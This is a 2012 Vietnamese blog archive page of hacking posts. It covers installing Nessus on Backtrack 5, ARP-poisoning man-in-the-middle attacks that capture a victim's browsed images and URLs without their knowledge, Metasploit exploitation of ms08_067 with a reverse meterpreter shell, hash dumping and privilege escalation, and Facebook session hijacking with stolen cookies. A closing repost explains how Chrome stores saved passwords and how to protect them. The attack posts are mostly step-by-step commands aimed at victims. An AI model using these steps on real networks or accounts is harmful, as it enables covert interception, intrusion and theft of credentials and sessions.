Hiển thị các bài đăng có nhãn Chuyên đề hack. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Chuyên đề hack. Hiển thị tất cả bài đăng

Thứ Hai, 17 tháng 12, 2012

Cài đặt Nessus trên Backtrack 5




Nessus là chương trình quét lỗ hổng bảo mật rất nổi tiếng trên thế giới, hồi ban đầu là chương trình mã nguồn mở, giờ đã đóng mã nguồn và kinh doanh thương mại trên đó. Tuy vậy, người dùng vẫn có thể sử dụng miễn phí Nessus khi đăng ký dịch vụ dùng tại nhà, không sử dụng vào mục đích quét lỗ hổng tại nơi làm việc.





Nessus chưa được tích hợp sẵn trên hệ điều hành Backtrack 5, chúng ta chỉ cần làm vài bước sau, vào link đăng ký một code:


http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code


Sau khi đăng ký xong, chúng ta sẽ có code được gửi về địa chỉ email.


Mở terminal và gõ lệnh dưới đây để đăng ký Nessus.

#/opt/nessus/bin/nessus-fetch –register MÃ CỦA BẠN TẠI ĐÂY
#/opt /nessus/bin/nessus-fetch –register A894-7673-3A9B-768A-6008



Bước thứ hai thêm người dùng Nessus,  bấm vào Application–> Backtrack–> Vulnerability assessment –> vulnerability scanner–> Nessus –> nessus user add

Nhập tên user, pass. Nếu muốn làm cho người dùng là quản trị viên của Nessus thì ta chỉ cần làm theo hướng dẫn của Nessus trên màn hình

Bước ba, khởi động Nessus, vào Application–> Backtrack–> Vulnerability assessment –> vulnerability scanner–> Nessus –> nessus start

Như vậy là hoàn tất cài đặt và bật Nessus. Giờ để sử dụng chúng ta chỉ việc mở trình duyệt ra và vào địa chỉ https://127.0.0.1:8834, nhập user và pass đã tạo ở bước trước để login là giờ chỉ việc quét.

Tấn công ARP+DNS Spoofing trên backtrack 5

Chủ Nhật, 16 tháng 12, 2012

Man-in-the-Mid bắt gói hình ảnh [Backtrack]



Backtrack Linux Server (attacker) 192.168.1.137
 Gateway: 192.168.1.1
 Victim: 192.168.1.138

Mô tả tấn công

Ta sẽ sử dụng "ARP Poisoning" để tấn công nhằm chuyển hướng dữ liệu từ victim đến máy attack. 
Sau đó chúng tôi sẽ sử dụng driftnet để nắm bắt tất cả hình ảnh máy tính của nạn nhân từ trình duyệt web của họ về máy tính của mình. Hình ảnh trên máy tính của nạn nhân sẽ được hiển thị trên hệ thống của chúng tôi.
Chúng tôi cũng sẽ chạy urlsnarf để hiển thị tất cả các URL các máy tính nạn nhân duyệt được hiển thị trên hệ thống của chúng tôi. Chúng tôi sẽ có thể nhìn thấy chính xác những URL của nạn nhân máy tính đang truy cập.
Tất cả điều này được thực hiện mà không có làm nạn nhân phát hiện hay truy cập vào máy tính của nạn nhân.

Bắt tay vào việc thôi :)

Chúng tôi muốn máy chủ Linux của chúng tôi hoạt động như một bộ định tuyến, để nó có thể bắt các lưu lượng dữ liệu vượt qua nó. Chúng tôi muốn có dữ liệu bị bắt lại trong bảng hiển thị bắt gói :D.

1) Để thực hiện điều này, chúng tôi sẽ sửa đổi các bảng IP và biến Linux thành một router.

                                                 cat / proc/sys/net/ipv4/ip_forward

2) Giá trị mặc định là "0". Nó sẽ được thiết lập để 1. Để thay đổi giá trị đến 1 nhập vào lệnh sau đây:

                                            sudo echo 1 >> / proc/sys/net/ipv4/ip_forward

3) Bây giờ đi trước và kiểm tra các tập tin ip_forward và đảm bảo giá trị bằng "1"

                                                     cat / proc/sys/net/ipv4/ip_forward

4) Một cuộc tấn công ngộ độc arp sẽ chuyển hướng dữ liệu từ máy tính của nạn nhân đi đến cửa ngõ của họ được chuyển hướng tới hộp của chúng tôi (lưu ý bạn có được trên cùng một thiết bị vật lý, chẳng hạn như một bộ chuyển mạch hoặc điểm truy cập để thực hiện việc này).

                                            sudo arpspoof-i eth1-t 192.168.1.138 192.168.1.1
"-i" lệnh quy định cụ thể interface mà chúng ta đang sử dụng. "-t" lệnh quy định cụ thể địa chỉ IP mục tiêu.

5) Bây giờ chúng ta sẽ sử dụng một cuộc tấn công ngộ độc arp để chuyển dữ liệu từ cổng dành cho trở lại PC của nạn nhân vào máy attack.

                                              sudo arpspoof-i eth1-t 192.168.1.1 192.168.1.137

6) Bây giờ chúng ta khởi động driftnet. Đang lắng nghe.

                                                                     driftnet sudo-i eth1

7) Khi PC của nạn nhân duyệt Internet, hình ảnh hiển thị trong trình duyệt web của mình cũng được hiển thị trên máy chủ Linux của kẻ tấn công.



8) Các máy tính kẻ tấn công ra mắt urlsnarf. URL được truy cập trên máy tính của nạn nhân được hiển thị trên máy chủ Linux của kẻ tấn công.

Khai thác lỗi với Nessus và tấn công vào server





tan cong server 2003 sp2

1. Dung chuong trinh Nessus tren firefox: 127.0.0.1:8834

2. Scan de biet ip server dinh loi nao nghiem trong.

3. Dung session duoc mo de di vao server, dieu khien he thong.

4. Dung metasploit:
 #msfconsole
 #help
 #search ms08_067 (tim thong tin ve loi da scan duoc)
 #info xploit/windows/smb/ms08_067_netapi (tim thong tin)
 #use exploit/windows/smb/ms08_067_netapi
 #show options
 #set RHOST [ip target]
 #set LHOST [ip attacker]
 #set PAYLOAD windows/meterpreter/reverse_tcp
 #exploit (tien hanh khai thac loi)

 #help (xem cac lenh mau khai thac tan cong victim)
 #sysinfo (xem thong tin hdh)
 #hashdump (lay noi dung file sam, giai ma pass)
 #getprivs (enable process privileges)
 #getsystem -h
     -t 1  (leo thang dac quyen)

5. Lay file SAM voi lenh hashdump, bo vao chuong trinh Cain & Abel de crack password.

Tấn công Hijack session facebook



Chú thích dòng lệnh:

nmap -f 192.168.0.0/24     :scan tất cả các máy trong mạng LAN, chúng ta có thể dùng phần mềm Cain & Abel trên wins để biết máy nào đang vào facebook để tấn công

sudo arpspoof -i interface -t [ip victim] [ip defalut gateway]

sudo arpspoof -i interface -t [ip defalut gateway ] [ip victim ]

Bam Alt+C de xuat hien box add cookies, va past cookies tu wireshark, sau đó F5 và tận hưởng kết quả.

Bảo mật Passwords đã lưu trên Google Chrome

Quản Trị Mạng - Một câu hỏi chung về trình duyệt Google Chrome là “tại sao không có chức năng master password (mật khẩu chính)?” Theo thông tin (không chính thức) từ Google thì việc sử dụng mật khẩu chính cho trình duyệt sẽ làm cho người dùng có cảm nhận sai lệch về bảo mật, và phương pháp khả thi nhất để bảo vệ dữ liệu là thông qua hệ thống an ninh tổng thể.
Vậy chính xác là làm thế nào để bảo mật cho những dữ liệu password của bạn được lưu trên Google Chrome?

Xem password đã lưu

Chrome bao gồm một trình quản lý mật khẩu và người dùng có thể truy cập thông qua Options Personal Stuff Manage saved passwords. Điều này không có gì mới bởi chỉ cần bạn từng cho phép Chrome lưu lại mật khẩu của mình, có thể bạn đã biết đến tính năng này.
Theo mặc định, để đảm bảo an ninh cho mật khẩu Chrome sẽ hiển thị chúng dưới dạng dấu *, để xem được bạn chỉ cần kích vào nút Show trước mỗi password cần xem.
Bảo mật Passwords đã lưu trên Google Chrome
Bảo mật Passwords đã lưu trên Google Chrome
Bởi vì không có hạn chế nào cho sự truy cập, nên chỉ cần ai đó sử dụng máy tính có cài đặt Chrome là họ sẽ xem được những password này. Tuy nhiên bạn chỉ có thể xem chúng mà không có cách nào export ra tập tin khác được.

Dữ liệu password được lưu ở đâu?

Những dữ liệu Mật khẩu được lưu trong một cơ sở dữ liệu SQLite có đường dẫn như sau:
%UserProfile%\AppData\Local\Google\Chrome\User Data\Default\Login Data
Bạn có thể mở tập tin này (có tên “Login Data”) bằng cách sử dụng SQLite Database Browser và xem bảng “logins”, tại đây chứa các password được bạn ấn Save. Tuy nhiên trường “password_value” đã được mã hóa nên bạn không thể xem được.
Bảo mật Passwords đã lưu trên Google Chrome

Bảo mật cho dữ liệu được mã hóa

Để thực hiện việc mã hóa (trong Windows), Chrome sử dụng chức năng Windows provided API. Các dữ liệu được mã hóa chỉ có thể đọc được bởi tài khoản người dùng Windows đã sử dụng để làm việc này. Do đó, về cơ bản mật khẩu chính là mật khẩu tài khoản Windows của bạn. Muốn xem được vùng dữ liệu này bắt buộc phải đăng nhập vào Windows bằng cùng một tài khoản.
Tuy nhiên, do mật khẩu tài khoản Windows là một hằng số, việc truy cập vào “master password” không phải là độc quyền của Chrome nên những tiện ích bên ngoài vẫn có thể nhận dạng được dữ liệu này và giải mã chúng.
Với tiện ích có sẵn ChromePass của NirSofft bạn có thể nhìn thấy toàn bộ dữ liệu mật khẩu được lưu và dễ dàng export chúng ra tập tin văn bản đơn giản.
Bảo mật Passwords đã lưu trên Google Chrome
Vì vậy tạo cho người dùng cảm giác rằng nếu tiện ích ChromePass có thể truy cập dữ liệu thì những phần mềm độc hại khác cũng có thể chạy bình thường và tài khoản người dùng khác cũng có thể truy cập mọi dữ liệu. Khi ChromePass.exe được tải lên VirusTotal, chỉ có hơn một nửa phần mềm anti-virus gán cờ “nguy hiểm”.

Sự bảo vệ có thể bị phá vỡ?

Giả sử máy tính của bạn chẳng may bị mất cắp và kẻ chộm đã sử dụng phần mềm để reset lại mật khẩu của Windows để trở về trạng thái đăng nhập nguyên bản. Nếu sau đó họ cố gắng để xem các password trong Chrome hoặc sử dụng tiện ích ChromePass thì dữ liệu sẽ không được cung cấp. Nguyên nhân đơn giản là do “master password” (với mật khẩu tài khoản Windows được ưu tiên để tự reset nó bên ngoài Windows) không phù hợp để giải mã.
Bảo mật Passwords đã lưu trên Google Chrome
Ngoài ra, nếu ai đó sao chép mật khẩu Chrome từ cơ sở dữ liệu SQLite và cố gắng truy cập vào nó trên máy tính khác, ChromePass sẽ hiển thị một mật khẩu trống với lý do tương tự như trên.
Bảo mật Passwords đã lưu trên Google Chrome

Kết luận

Suy cho cùng, việc bảo mật cho các mật khẩu lưu trên Chrome hoàn toàn dựa vào chính người dùng nó.
  • Sử dụng mật khẩu thật mạnh cho tài khoản Windows. Hãy nhớ rằng có những tiện ích có thể giải mã mật khẩu Windows, nếu ai đó có được mật khẩu này họ sẽ có quyền truy cập vào mật khẩu lưu trên trình duyệt của bạn.
  • Tự bảo về mình khỏi những phần mềm độc hại. Nếu tiện ích nào đó có thể dễ dàng truy cập vào mật khẩu đã lưu, vậy tại sao các phần mềm độc hại lại không thể?
  • Lưu trữ mật khẩu của mình trên hệ thống quản lý mật khẩu như KeePass. Tất nhiên bạn sẽ mất đi sự tiện lợi khi trình duyệt tự động điền giúp những mật khẩu này.
  • Sử dụng một tiện ích của bên thứ ba có tích hợp với Chrome và sử dụng một mật khẩu chính để quản lý.
  • Mã hóa toàn bộ ổ đĩa cứng bằng ứng dụng như TrueCrypt. Đây là giải pháp “siêu bảo vệ” cho toàn bộ dữ liệu của bạn.
Nguồn HowtoGeek